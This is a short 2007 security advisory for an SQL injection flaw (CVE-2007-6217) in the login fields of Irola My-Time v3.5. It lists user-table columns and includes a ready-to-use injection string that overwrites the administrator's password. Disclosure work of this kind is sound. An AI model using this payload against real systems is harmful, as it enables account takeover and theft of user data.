SecurityAlert : 3414 CVE : CVE-2007-6217 SecurityRisk : Medium (About) Remote Exploit : Yes Local Exploit : No Exploit Available : Yes Credit : Aria-Security Team Published : 04.12.2007
Affected Software :
Irola My-Time
Advisory Content :
Aria-Security Team
http://Aria-Security.Net
-----------------------------
Original Advisory (and more details) @
http://aria-security.net/forum/showthread.php?p=1106
Irola My-Time v3.5
http://www.irola.com
Username/Password Fields can run SQL Queries. Therefore:
We get the Tables:
UserInfo.UserID
UserInfo.Login
UserInfo.Password
UserInfo.UserNumber
UserInfo.FirstName
UserInfo.LastName
UserInfo.TeamID
UserInfo.Address
UserInfo.City
UserInfo.ZipCode
UserInfo.CountryID
UserInfo.Phone
Useful Injection: (changes admin's passwsord to hacked)
-1' UPDATE UserInfo set Password= 'hacked' Where(UserID= '1');--
MORE HELP AT the Original Page.
Greetz: AurA
Credits goes to Aria-Security Team
Regards,
The-0utl4w
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.